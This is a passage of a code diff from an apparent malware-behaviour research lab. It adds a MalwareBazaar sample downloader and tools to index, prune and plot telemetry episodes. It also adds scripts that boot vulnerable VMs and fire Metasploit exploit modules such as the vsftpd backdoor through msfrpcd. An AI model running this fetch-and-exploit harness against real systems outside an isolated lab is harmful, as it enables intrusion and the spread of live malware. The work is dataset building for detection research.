MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
MalwareBazaar requires a free API key as of late 2023; sign up at
https://bazaar.abuse.ch and either pass via env or place in
``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
zip is unencrypted by ``infected`` per the MB convention.
The fetcher is intentionally read-only over the network no upload,
no metadata posted so a lab host with a tightly-egress-firewalled
WG mesh can run it once on a build host and rsync the resulting
``samples/store/`` directory across the fleet.
"""
from __future__ import annotations
import argparse
import hashlib
import os
import sys
import urllib.parse
import urllib.request
import zipfile
from pathlib import Path
MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
MB_ZIP_PASSWORD = b"infected"
def _read_api_key(repo_root: Path) -> str | None:
env = os.environ.get("MALWAREBAZAAR_API_KEY")
if env:
return env.strip()
token = repo_root / "samples" / ".bazaar.token"
if token.exists():
return token.read_text().strip()
return None
def fetch_sample(
sha256: str,
out_dir: Path,
api_key: str,
*,
timeout_s: float = 60.0,
) -> Path:
if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
sha256 = sha256.lower()
out_dir.mkdir(parents=True, exist_ok=True)
target = out_dir / sha256
if target.exists():
actual = hashlib.sha256(target.read_bytes()).hexdigest()
if actual == sha256:
return target
target.unlink() # tampered or partial; refetch.
body = urllib.parse.urlencode({
"query": "get_file",
"sha256_hash": sha256,
}).encode("utf-8")
req = urllib.request.Request(
MB_ENDPOINT,
data=body,
headers={
"Auth-Key": api_key,
"User-Agent": "cis490-fetcher/0",
},
method="POST",
)
with urllib.request.urlopen(req, timeout=timeout_s) as r:
payload = r.read()
if not payload.startswith(b"PK"):
raise RuntimeError(
f"MalwareBazaar returned non-zip response (first 200 bytes): "
f"{payload[:200]!r}"
)
zip_path = out_dir / f"{sha256}.zip"
zip_path.write_bytes(payload)
try:
with zipfile.ZipFile(zip_path) as zf:
zf.setpassword(MB_ZIP_PASSWORD)
names = zf.namelist()
if not names:
raise RuntimeError(f"{sha256}: empty zip")
with zf.open(names[0]) as src, target.open("wb") as dst:
dst.write(src.read())
finally:
zip_path.unlink(missing_ok=True)
actual = hashlib.sha256(target.read_bytes()).hexdigest()
if actual != sha256:
target.unlink()
raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
return target
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="fetch_sample")
p.add_argument("sha256")
p.add_argument(
"--out-dir",
type=Path,
default=None,
help="Where to drop <sha256> (default: samples/store/ relative to repo)",
)
args = p.parse_args(argv)
repo_root = Path(__file__).resolve().parent.parent
out_dir = args.out_dir or (repo_root / "samples" / "store")
api_key = _read_api_key(repo_root)
if not api_key:
print(
"no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
"samples/.bazaar.token (mode 0600). Register at "
"https://bazaar.abuse.ch.",
file=sys.stderr,
)
return 2
try:
path = fetch_sample(args.sha256, out_dir, api_key)
except Exception as e:
print(f"fetch failed: {e}", file=sys.stderr)
return 1
print(path)
return 0
if __name__ == "__main__":
sys.exit(main())

136
tools/index_reader.py Normal file
View file

@ -0,0 +1,136 @@
"""Read + filter the receiver's ``index.jsonl``.
Usage:
# All episodes from one host:
cis490-index --host lab-host-1
# All episodes for a particular sample:
cis490-index --sample xmrig-cryptominer
# Today's episodes, sorted by size:
cis490-index --since 2026-04-30 --sort size
# Group/count by host:
cis490-index --count-by host_id
The index file is the closest thing to a database the receiver has
until we move to Postgres/Timescale. This tool is the temporary CLI
view over it; it's intentionally read-only and never opens episode
tarballs (just the index rows).
"""
from __future__ import annotations
import argparse
import json
import sys
from collections import Counter
from datetime import datetime, timezone
from pathlib import Path
DEFAULT_INDEX = "/var/lib/cis490/index.jsonl"
def _parse_since(s: str) -> datetime:
# Accept ISO-8601 with or without time.
for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d", "%Y-%m-%dT%H:%M:%S"):
try:
dt = datetime.strptime(s, fmt)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=timezone.utc)
return dt
except ValueError:
continue
# Last resort: fromisoformat which handles a wider range in 3.11+.
dt = datetime.fromisoformat(s)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=timezone.utc)
return dt
def _row_time(row: dict) -> datetime | None:
s = row.get("received_at_wall")
if not s:
return None
try:
return datetime.fromisoformat(s.replace("Z", "+00:00"))
except ValueError:
return None
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-index")
p.add_argument("--index", default=DEFAULT_INDEX,
help=f"path to index.jsonl (default {DEFAULT_INDEX})")
p.add_argument("--host", help="only rows from this host_id")
p.add_argument("--sample",
help="only rows whose meta.sample.name matches "
"(requires meta.json from a recent commit)")
p.add_argument("--since", help="ISO date or datetime; only rows received on/after")
p.add_argument("--until", help="ISO date or datetime; only rows received before")
p.add_argument("--sort", choices=("time", "size", "host"), default="time")
p.add_argument("--count-by",
choices=("host_id", "schema_version"),
help="instead of printing rows, group + count by this field")
p.add_argument("--limit", type=int, default=0,
help="cap output rows (0 = all)")
args = p.parse_args(argv)
path = Path(args.index)
if not path.exists():
print(f"no index at {path}", file=sys.stderr)
return 2
since = _parse_since(args.since) if args.since else None
until = _parse_since(args.until) if args.until else None
rows: list[dict] = []
with path.open() as f:
for line in f:
line = line.strip()
if not line:
continue
try:
row = json.loads(line)
except json.JSONDecodeError:
continue
if args.host and row.get("host_id") != args.host:
continue
if since or until:
t = _row_time(row)
if t is None:
continue
if since and t < since:
continue
if until and t >= until:
continue
rows.append(row)
if args.count_by:
counts = Counter(r.get(args.count_by, "<missing>") for r in rows)
for k, n in counts.most_common():
print(f"{n:>6} {k}")
return 0
sort_keys = {
"time": lambda r: r.get("received_at_wall", ""),
"size": lambda r: r.get("size_bytes", 0),
"host": lambda r: r.get("host_id", ""),
}
rows.sort(key=sort_keys[args.sort])
if args.limit:
rows = rows[-args.limit:] if args.sort != "size" else rows[:args.limit]
# Print TSV-ish for quick eyeballing + downstream pipe-friendliness.
print("received_at_wall\thost_id\tepisode_id\tsize_bytes\tschema_version\tsha256")
for r in rows:
print("\t".join(str(r.get(k, "")) for k in
("received_at_wall", "host_id", "episode_id",
"size_bytes", "schema_version", "sha256")))
return 0
if __name__ == "__main__":
sys.exit(main())

View file

@ -1,8 +1,19 @@
"""Plot a single episode's envelope.
Reads ``telemetry-proc.jsonl`` and ``labels.jsonl`` from an episode directory
and renders a 3-panel chart: CPU%, RSS, IO write rate, with phase bands
underneath.
Renders a multi-panel chart from whatever telemetry the episode dir
contains, with phase bands underneath each panel:
panel 1 host /proc CPU% (source 1, always)
panel 2 host /proc RSS (source 1, always)
panel 3 host /proc IO write (source 1, always)
panel 4 QMP block I/O ops (source 2, if telemetry-qmp.jsonl)
panel 5 perf IPC + miss-rate (source 3, if telemetry-perf.jsonl)
panel 6 bridge pcap pkts/s (source 4, if netflow.jsonl)
panel 7 guest agent CPU/load (source 5, if telemetry-guest.jsonl)
Missing sources are silently skipped a Tier-1 episode dir with only
proc telemetry still gets the original 3-panel plot. A Tier-3+ run
with all five sources gets the full stack on a shared time axis.
Two modes:
@ -103,21 +114,77 @@ def main() -> int:
end = labels[i + 1]["t_mono_ns"] / 1e9 if i + 1 < len(labels) else end_t
spans.append((start, end, lbl["phase"]))
fig, axes = plt.subplots(3, 1, figsize=(13, 8), sharex=True)
# Discover optional sources.
qmp_rows = _load_jsonl(d / "telemetry-qmp.jsonl") if (d / "telemetry-qmp.jsonl").exists() else []
perf_rows = _load_jsonl(d / "telemetry-perf.jsonl") if (d / "telemetry-perf.jsonl").exists() else []
netflow_rows = _load_jsonl(d / "netflow.jsonl") if (d / "netflow.jsonl").exists() else []
guest_rows = _load_jsonl(d / "telemetry-guest.jsonl") if (d / "telemetry-guest.jsonl").exists() else []
axes[0].plot(t, cpu_pct, color="#222222", linewidth=1.0)
axes[0].set_ylabel("CPU %")
axes[0].set_ylim(-3, 110)
axes[0].grid(alpha=0.25)
panels: list[tuple[str, callable]] = [] # (ylabel, plot_fn(ax))
panels.append(("CPU % (proc)", lambda ax: (
ax.plot(t, cpu_pct, color="#222222", linewidth=1.0),
ax.set_ylim(-3, 110),
)))
panels.append(("RSS (MiB)", lambda ax: ax.plot(t, rss_mib, color="#222222", linewidth=1.0)))
panels.append(("IO write (KiB/s)", lambda ax: ax.plot(t, io_kb_s, color="#222222", linewidth=1.0)))
axes[1].plot(t, rss_mib, color="#222222", linewidth=1.0)
axes[1].set_ylabel("RSS (MiB)")
axes[1].grid(alpha=0.25)
if qmp_rows:
qt = [r["t_mono_ns"] / 1e9 for r in qmp_rows]
# Sum block I/O ops across devices.
wr_ops = []
rd_ops = []
for r in qmp_rows:
bs = r.get("blockstats") or {}
wr_ops.append(sum(d.get("wr_ops", 0) for d in bs.values()))
rd_ops.append(sum(d.get("rd_ops", 0) for d in bs.values()))
panels.append(("QMP block ops (cum)", lambda ax: (
ax.plot(qt, wr_ops, color="#cc4444", linewidth=1.0, label="wr_ops"),
ax.plot(qt, rd_ops, color="#4488cc", linewidth=1.0, label="rd_ops"),
ax.legend(loc="upper left", fontsize=8),
)))
axes[2].plot(t, io_kb_s, color="#222222", linewidth=1.0)
axes[2].set_ylabel("IO write (KiB/s)")
axes[2].set_xlabel("time (s)")
axes[2].grid(alpha=0.25)
if perf_rows:
pt = [r["t_mono_ns"] / 1e9 for r in perf_rows]
ipc = [r.get("ipc") or 0 for r in perf_rows]
miss = [r.get("cache_miss_rate") or 0 for r in perf_rows]
panels.append(("perf IPC / miss-rate", lambda ax: (
ax.plot(pt, ipc, color="#222222", linewidth=1.0, label="IPC"),
ax.plot(pt, miss, color="#cc4444", linewidth=1.0, label="cache miss rate"),
ax.legend(loc="upper right", fontsize=8),
)))
if netflow_rows:
nt = [r["t_mono_ns"] / 1e9 for r in netflow_rows]
pkts = [(r.get("pkts_in", 0) + r.get("pkts_out", 0)) for r in netflow_rows]
synf = [r.get("syn_count", 0) for r in netflow_rows]
panels.append(("bridge pkts / SYNs (per 100 ms)", lambda ax: (
ax.plot(nt, pkts, color="#222222", linewidth=1.0, label="pkts"),
ax.plot(nt, synf, color="#cc4444", linewidth=1.0, label="syn"),
ax.legend(loc="upper right", fontsize=8),
)))
if guest_rows:
gt = [r["t_mono_ns"] / 1e9 for r in guest_rows]
load1 = [(r.get("load_1m_5m_15m") or [0])[0] for r in guest_rows]
mem_used = [
((r.get("mem_total_bytes") or 0) - (r.get("mem_available_bytes") or 0)) / (1024 * 1024)
for r in guest_rows
]
panels.append(("guest load1 / mem_used (MiB)", lambda ax: (
ax.plot(gt, load1, color="#222222", linewidth=1.0, label="load1"),
ax.twinx().plot(gt, mem_used, color="#4488cc", linewidth=1.0, label="mem MiB"),
)))
n = len(panels)
fig, axes = plt.subplots(n, 1, figsize=(13, 2 + 1.6 * n), sharex=True)
if n == 1:
axes = [axes]
for ax, (ylabel, plot_fn) in zip(axes, panels):
plot_fn(ax)
ax.set_ylabel(ylabel)
ax.grid(alpha=0.25)
axes[-1].set_xlabel("time (s)")
for ax in axes:
for start, end, phase in spans:

364
tools/prune_episodes.py Normal file
View file

@ -0,0 +1,364 @@
"""``cis490-prune`` — retroactively filter low-quality episodes from
the receiver's dataset.
The signals that mark an episode as low-quality:
no-sample meta.sample is null. Pre-Sample-propagation code
(commit a193d17 or earlier) ran the v1 yes-loop
fallback regardless of what the fleet picked, so
post-infection variety isn't recorded in meta.
no-workload-events events.jsonl has zero workload_* rows. Pre-audit-
trail code (commit d86502d or earlier) ran with
no event emission from VMLoadController, so we
can't tell whether the workload actually fired.
workload-failed events.jsonl contains a workload_failed row. The
SerialClient.run() raised mid-phase; the labels
and telemetry don't match what the orchestrator
was supposed to be doing.
workload-silent workload_killed event during the dormant phase
has pre_kill_probe.yes == "0", meaning no
``yes``-loop process was running when we tried
to kill it. This is the elliott-lab fingerprint:
the schedule walked but nothing fired in-guest.
flat-cpu /proc CPU% delta between phases is under 5
percentage points across all phase boundaries.
A model trained on these episodes can't
distinguish phases.
Usage:
cis490-prune # dry-run summary, no changes
cis490-prune --reason no-sample # filter to one signal
cis490-prune --archive # mv flagged episodes to
# /var/lib/cis490/episodes-archive/
cis490-prune --delete # rm flagged episodes + index rows
Run from the receiver's host where /var/lib/cis490/ lives. Operator
runs as root because the episode store is owned by the cis490 user
mode 0640.
"""
from __future__ import annotations
import argparse
import io
import json
import os
import shutil
import statistics
import subprocess
import sys
import tarfile
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import Iterator
_REASONS = (
"no-sample",
"no-workload-events",
"workload-failed",
"workload-silent",
"flat-cpu",
)
@dataclass
class EpisodeQuality:
host_id: str
episode_id: str
tar_path: Path
size_bytes: int
reasons: list[str] = field(default_factory=list)
sample_name: str | None = None
module_name: str | None = None
@property
def fake(self) -> bool:
return bool(self.reasons)
# ---------------------------------------------------------------------------
# tarball introspection
# ---------------------------------------------------------------------------
def _read_jsonl_from_tar(tar: tarfile.TarFile, name_suffix: str) -> list[dict]:
"""Extract a JSONL member by name suffix (e.g. 'events.jsonl')."""
for m in tar.getmembers():
if m.name.endswith(name_suffix) and m.isfile():
f = tar.extractfile(m)
if f is None:
return []
text = f.read().decode("utf-8", errors="replace")
return [json.loads(line) for line in text.splitlines() if line.strip()]
return []
def _read_meta_from_tar(tar: tarfile.TarFile) -> dict:
for m in tar.getmembers():
if m.name.endswith("meta.json") and m.isfile():
f = tar.extractfile(m)
if f is None:
return {}
return json.loads(f.read().decode("utf-8"))
return {}
def _decompress_zstd(zst_path: Path) -> bytes:
"""Pure stdlib doesn't have zstd; shell out (already a project dep
install scripts require it)."""
p = subprocess.run(
["zstd", "-q", "-d", "--stdout", str(zst_path)],
check=True, capture_output=True,
)
return p.stdout
def classify_episode(tar_zst: Path, host_id: str, episode_id: str) -> EpisodeQuality:
"""Open the tarball, scan meta + events + telemetry, return a
quality verdict. Each signal is independent an episode can hit
multiple reasons (e.g. no-sample + workload-silent)."""
q = EpisodeQuality(
host_id=host_id,
episode_id=episode_id,
tar_path=tar_zst,
size_bytes=tar_zst.stat().st_size,
)
try:
raw = _decompress_zstd(tar_zst)
except (subprocess.CalledProcessError, OSError) as e:
q.reasons.append(f"unreadable: {e}"[:80])
return q
with tarfile.open(fileobj=io.BytesIO(raw)) as tar:
meta = _read_meta_from_tar(tar)
events = _read_jsonl_from_tar(tar, "events.jsonl")
proc = _read_jsonl_from_tar(tar, "telemetry-proc.jsonl")
labels = _read_jsonl_from_tar(tar, "labels.jsonl")
sample = meta.get("sample")
if sample is None:
q.reasons.append("no-sample")
else:
q.sample_name = sample.get("name")
exploit = meta.get("exploit")
if exploit is not None:
q.module_name = exploit.get("module_name")
workload_events = [e for e in events if str(e.get("event", "")).startswith("workload_")]
if not workload_events:
q.reasons.append("no-workload-events")
if any(e.get("event") == "workload_failed" for e in events):
q.reasons.append("workload-failed")
# workload-silent: dormant transition's probe shows no `yes` proc.
for e in events:
if e.get("event") != "workload_killed":
continue
if e.get("phase") != "dormant":
continue
probe = e.get("pre_kill_probe")
if isinstance(probe, dict) and probe.get("yes") == "0":
q.reasons.append("workload-silent")
break
# flat-cpu: bucket /proc CPU% by phase, check inter-phase spread.
if proc and labels:
clk_tck = os.sysconf("SC_CLK_TCK")
def phase_at(t_ns: int) -> str:
cur = "(pre)"
for l in labels:
if l["t_mono_ns"] <= t_ns:
cur = l["phase"]
else:
break
return cur
per_phase: dict[str, list[float]] = {}
prev = None
for r in proc:
if prev is not None:
dt = (r["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
if dt > 0:
djiff = (r["cpu_user_jiffies"] + r["cpu_sys_jiffies"]) - \
(prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
pct = 100.0 * (djiff / clk_tck) / dt
per_phase.setdefault(phase_at(r["t_mono_ns"]), []).append(pct)
prev = r
if per_phase:
medians = [statistics.median(v) for v in per_phase.values() if v]
if medians and (max(medians) - min(medians)) < 5.0:
q.reasons.append("flat-cpu")
return q
# ---------------------------------------------------------------------------
# Index walking + actions
# ---------------------------------------------------------------------------
def walk_index(index_path: Path, episodes_root: Path) -> Iterator[tuple[dict, Path]]:
if not index_path.exists():
return
for line in index_path.read_text().splitlines():
if not line.strip():
continue
try:
row = json.loads(line)
except json.JSONDecodeError:
continue
host = row.get("host_id", "")
ep = row.get("episode_id", "")
if not host or not ep:
continue
tar = episodes_root / host / f"{ep}.tar.zst"
if not tar.exists():
continue
yield row, tar
def apply_action(
quals: list[EpisodeQuality],
*,
action: str,
archive_root: Path,
index_path: Path,
) -> None:
"""Carry out --delete or --archive on flagged episodes + drop
matching rows from index.jsonl. Atomic-ish: index rewrite is
single-shot after all tarballs are handled."""
if action not in ("delete", "archive"):
return
flagged_ids = {q.episode_id for q in quals if q.fake}
if not flagged_ids:
return
if action == "archive":
archive_root.mkdir(parents=True, exist_ok=True)
for q in quals:
if not q.fake:
continue
if action == "archive":
target = archive_root / q.host_id
target.mkdir(parents=True, exist_ok=True)
shutil.move(str(q.tar_path), target / q.tar_path.name)
elif action == "delete":
q.tar_path.unlink(missing_ok=True)
if index_path.exists():
kept = []
for line in index_path.read_text().splitlines():
try:
row = json.loads(line)
except json.JSONDecodeError:
kept.append(line)
continue
if row.get("episode_id") in flagged_ids:
continue
kept.append(line)
# Rewrite via tempfile + replace so a crash mid-write doesn't
# corrupt the live index.
tmp = index_path.with_suffix(".jsonl.partial")
tmp.write_text("\n".join(kept) + ("\n" if kept else ""))
os.replace(tmp, index_path)
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-prune")
p.add_argument("--episodes-root", type=Path,
default=Path("/var/lib/cis490/episodes"))
p.add_argument("--index", type=Path,
default=Path("/var/lib/cis490/index.jsonl"))
p.add_argument("--archive-root", type=Path,
default=Path("/var/lib/cis490/episodes-archive"))
p.add_argument("--reason", action="append", choices=_REASONS,
help="Only flag episodes matching this reason. Repeat "
"to OR multiple. Default: all reasons.")
p.add_argument("--host", help="Only consider episodes from this host_id")
action = p.add_mutually_exclusive_group()
action.add_argument("--delete", action="store_true",
help="Remove flagged tarballs + drop their index rows")
action.add_argument("--archive", action="store_true",
help="Move flagged tarballs to --archive-root + drop index rows")
p.add_argument("--json", action="store_true",
help="Machine-readable output instead of summary")
args = p.parse_args(argv)
if not args.episodes_root.exists():
print(f"no episodes dir at {args.episodes_root}", file=sys.stderr)
return 2
selected_reasons = set(args.reason or _REASONS)
quals: list[EpisodeQuality] = []
for row, tar in walk_index(args.index, args.episodes_root):
if args.host and row["host_id"] != args.host:
continue
q = classify_episode(tar, row["host_id"], row["episode_id"])
# Only mark "fake" if at least one of the selected reasons hits.
q.reasons = [r for r in q.reasons if r in selected_reasons]
quals.append(q)
flagged = [q for q in quals if q.fake]
kept = [q for q in quals if not q.fake]
if args.json:
print(json.dumps({
"scanned": len(quals),
"flagged": len(flagged),
"kept": len(kept),
"by_reason": {
r: sum(1 for q in flagged if r in q.reasons) for r in _REASONS
},
"flagged_episodes": [
{
"host": q.host_id,
"episode": q.episode_id,
"size_bytes": q.size_bytes,
"reasons": q.reasons,
"sample": q.sample_name,
"module": q.module_name,
} for q in flagged
],
}, indent=2))
else:
print(f"scanned: {len(quals)} flagged: {len(flagged)} kept: {len(kept)}")
if flagged:
print()
print(f"{'host':<14} {'episode':<28} {'size':>9} reasons")
for q in flagged:
print(f"{q.host_id:<14} {q.episode_id:<28} {q.size_bytes:>9} "
f"{','.join(q.reasons)}")
if not (args.delete or args.archive):
print()
print("dry-run only. Re-run with --archive (safer) or --delete.")
if args.delete or args.archive:
action = "delete" if args.delete else "archive"
apply_action(
quals,
action=action,
archive_root=args.archive_root,
index_path=args.index,
)
print(f"\n{action}d {sum(1 for q in flagged)} episodes")
return 0 if not flagged else 1
if __name__ == "__main__":
sys.exit(main())

109
tools/run_fleet.py Normal file
View file

@ -0,0 +1,109 @@
"""``cis490-fleet`` — run as many concurrent labeled episodes as the
host can handle, drawing samples from the manifest.
Modes:
--capacity Print the resource calculation and exit. No VMs spawned.
--waves N Run N waves of episodes (one wave = max_concurrent
episodes, each in its own slot). Default: 1.
--max-concurrent N
Cap concurrency below the auto-detected ceiling.
"""
from __future__ import annotations
import argparse
import json
import logging
import os
import signal
import sys
from pathlib import Path
# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from exploits.modules import load_module_configs # noqa: E402
from orchestrator.fleet import ( # noqa: E402
FleetConfig, FleetRunner, capacity_report, detect_capacity,
)
from samples.manifest import SampleManifest # noqa: E402
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-fleet")
p.add_argument("--capacity", action="store_true")
p.add_argument("--waves", type=int, default=1)
p.add_argument("--max-concurrent", type=int, default=None)
p.add_argument("--manifest",
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
p.add_argument("--modules-dir",
default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
p.add_argument("--data-root", default="data")
p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
p.add_argument("--ram-per-vm-mib", type=int, default=320)
p.add_argument("--require-real-samples", action="store_true")
p.add_argument("--force-tier2", action="store_true",
help="Skip Tier 3 even when msfrpcd is reachable")
p.add_argument("--log-level", default="INFO")
args = p.parse_args(argv)
logging.basicConfig(
level=getattr(logging, args.log_level.upper(), logging.INFO),
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
if args.capacity:
print(capacity_report())
return 0
manifest = SampleManifest.load(args.manifest)
repo_root = Path(__file__).resolve().parent.parent
modules_dir = Path(args.modules_dir)
modules = load_module_configs(modules_dir) if modules_dir.exists() else {}
cfg = FleetConfig(
host_id=args.host_id,
repo_root=repo_root,
data_root=Path(args.data_root).resolve(),
manifest=manifest,
modules=modules,
ram_per_vm_mib=args.ram_per_vm_mib,
max_concurrent_override=args.max_concurrent,
require_real_samples=args.require_real_samples,
force_tier2=args.force_tier2,
)
runner = FleetRunner(cfg)
def _stop(signum, frame): # noqa: ARG001
runner.stop()
signal.signal(signal.SIGTERM, _stop)
signal.signal(signal.SIGINT, _stop)
result = runner.run(episodes=args.waves)
print(json.dumps({
"host_id": args.host_id,
"capacity": result.capacity.to_dict(),
"modules_loaded": sorted(modules.keys()),
"slots": [
{
"slot": s.slot,
"sample": s.sample_name,
"sample_kind": s.sample_kind,
"tier": s.tier,
"module": s.module_name,
"rc": s.rc,
"duration_s": s.duration_s,
"error": s.error,
} for s in result.slots
],
"total_duration_s": result.total_duration_s,
}, indent=2))
return 0 if all(s.rc == 0 for s in result.slots) else 1
if __name__ == "__main__":
sys.exit(main())

View file

@ -27,7 +27,9 @@ from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
sys.path.insert(0, str(Path(__file__).resolve().parent))
from collectors import qmp # noqa: E402
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
from samples.manifest import SampleManifest # noqa: E402
from vm_load_controller import VMLoadController # noqa: E402
from vm_serial import SerialClient # noqa: E402
@ -69,7 +71,17 @@ def main() -> int:
parser.add_argument("--interval-ms", type=int, default=100)
parser.add_argument(
"--run-dir",
default="/tmp/cis490-vm",
# Per-slot defaults so the fleet runner's parallel calls don't
# collide on the same /tmp dir (which would have rmtree'd each
# other's pidfiles mid-boot — see CIS490 history). Resolution
# order:
# 1) explicit --run-dir CLI flag
# 2) RUN_DIR env (set by the fleet runner)
# 3) /tmp/cis490-vm-<SLOT> (SLOT defaults to 0)
default=(
os.environ.get("RUN_DIR")
or f"/tmp/cis490-vm-{os.environ.get('SLOT', '0')}"
),
help="QEMU run dir (sockets + pidfile go here)",
)
parser.add_argument(
@ -83,6 +95,16 @@ def main() -> int:
default=120.0,
help="how long to wait for serial login prompt",
)
parser.add_argument(
"--sample",
default=os.environ.get("SAMPLE_NAME"),
help="Pick a workload profile from the manifest by name. Fleet runner "
"passes this via SAMPLE_NAME env. If unset, runs the v1 yes-loop.",
)
parser.add_argument(
"--manifest",
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
)
args = parser.parse_args()
logging.basicConfig(
@ -93,6 +115,17 @@ def main() -> int:
repo_root = Path(__file__).resolve().parent.parent
launcher = repo_root / "vm" / "launch_demo.sh"
# Resolve sample if requested.
sample = None
if args.sample:
manifest = SampleManifest.load(args.manifest)
sample = next((s for s in manifest.samples if s.name == args.sample), None)
if sample is None:
log.error("sample %r not in manifest %s", args.sample, args.manifest)
return 2
log.info("using sample=%s profile=%s kind=%s",
sample.name, sample.profile, sample.kind)
run_dir = Path(args.run_dir)
# Wipe any stale sockets/pidfile from a previous run.
if run_dir.exists():
@ -137,9 +170,42 @@ def main() -> int:
serial.connect()
serial.login(boot_timeout_s=args.boot_timeout)
controller = VMLoadController(serial)
# Take a savevm AFTER the guest is fully up but BEFORE we
# start any workload. EpisodeConfig.revert_at_{start,end} use
# this snapshot for inter-episode reverts (the snapshot lives
# in the qcow2's per-VM-process overlay since launch_demo.sh
# runs with snapshot=on, so it's discarded with the VM).
# Without this step, loadvm would target a snapshot that
# doesn't exist and silently emit snapshot_revert_failed.
qmp_sock = run_dir / "qmp.sock"
if qmp_sock.exists():
try:
_qmp = qmp.QMPClient(qmp_sock)
_qmp.connect()
try:
out = _qmp.savevm("baseline-v1")
log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
finally:
_qmp.close()
except Exception as e:
log.warning("savevm failed; revert_at_start unusable: %s", e)
# Bind the controller to the runner's event log so workload
# success/failure shows up alongside phase_transition events.
# Sample also goes into EpisodeConfig below so meta.sample
# records what was supposed to run.
runner_for_emit = {"runner": None}
controller = VMLoadController(
serial,
sample=sample,
emit_event=lambda ev, **kw: (
runner_for_emit["runner"].emit_event(ev, **kw)
if runner_for_emit["runner"] else None
),
)
controller.setup()
agent_sock = run_dir / "agent.sock"
cfg = EpisodeConfig(
target_pid=qemu_pid,
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
@ -148,9 +214,18 @@ def main() -> int:
phase_schedule=DEFAULT_SCHEDULE,
image_name="alpine-3.21-cloudinit",
snapshot_name="baseline-v1",
qmp_socket=qmp_sock if qmp_sock.exists() else None,
guest_agent_socket=agent_sock if agent_sock.exists() else None,
bridge_iface=os.environ.get("BRIDGE") or None,
sample=sample,
)
result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
runner = EpisodeRunner(cfg, on_phase=controller.set_phase)
# Connect the controller's event sink to the runner now that
# both exist. (Forward-reference closure pattern keeps the
# constructor argument order natural.)
runner_for_emit["runner"] = runner
result = runner.run()
controller.teardown()
serial.close()

300
tools/run_tier3_demo.py Normal file
View file

@ -0,0 +1,300 @@
"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.
Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
against it, and lets the orchestrator's host /proc collector sample
the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
the workload that crosses the ``armed -> infecting`` boundary is now
generated by an actual exploit landing a session, not by a script in
the guest.
Prereqs:
- vm/images/<target>.qcow2 (e.g. Metasploitable2)
- msfrpcd running locally:
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
- ``msgpack`` python package installed (added to runtime deps)
Run:
MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
--module vsftpd_234_backdoor \\
--data-root data
"""
from __future__ import annotations
import argparse
import logging
import os
import signal
import subprocess
import sys
import time
from pathlib import Path
# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from collectors import qmp # noqa: E402
from exploits.driver import DriverConfig, MSFExploitDriver # noqa: E402
from exploits.modules import load_module_config # noqa: E402
from exploits.msfrpc import MSFRpcClient, MSFRpcConfig # noqa: E402
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
from samples.manifest import SampleManifest # noqa: E402
# Same envelope shape as Tier 2 so plots are comparable. Slightly more
# armed/infecting time because real exploit fire + session establishment
# takes hundreds of ms to a few seconds.
DEFAULT_SCHEDULE = [
("clean", 10.0),
("armed", 3.0),
("infecting", 5.0),
("infected_running", 25.0),
("dormant", 15.0),
("infected_running", 20.0),
("dormant", 5.0),
("clean", 5.0),
]
def _wait_for_path(path: Path, timeout_s: float) -> None:
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
if path.exists() and path.read_text().strip():
return
time.sleep(0.2)
raise TimeoutError(f"{path} never appeared within {timeout_s}s")
def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
import socket
deadline = time.monotonic() + timeout_s
last_err: Exception | None = None
while time.monotonic() < deadline:
try:
with socket.create_connection((host, port), timeout=1.0):
return
except OSError as e:
last_err = e
time.sleep(1.0)
raise TimeoutError(
f"target service {host}:{port} not reachable within {timeout_s}s "
f"(last: {last_err})"
)
def main() -> int:
parser = argparse.ArgumentParser(prog="run_tier3_demo")
parser.add_argument("--data-root", default="data")
parser.add_argument("--interval-ms", type=int, default=100)
parser.add_argument(
"--module",
default="vsftpd_234_backdoor",
help="Module config name in exploits/modules/<name>.toml",
)
parser.add_argument(
"--target-ip",
default="127.0.0.1",
help="Address the exploit module sets RHOSTS to. With the SLIRP "
"launcher (default), the guest's vulnerable port is hostfwd'd to "
"loopback; on a host-only bridge, this is the guest's bridge IP.",
)
parser.add_argument(
"--target-port",
type=int,
default=21,
help="Probe port to wait on before firing the exploit",
)
parser.add_argument(
"--run-dir",
# Per-slot defaults so the fleet runner's parallel calls don't
# collide on the same /tmp dir. See run_real_vm_demo.py for
# the same fix.
default=(
os.environ.get("RUN_DIR")
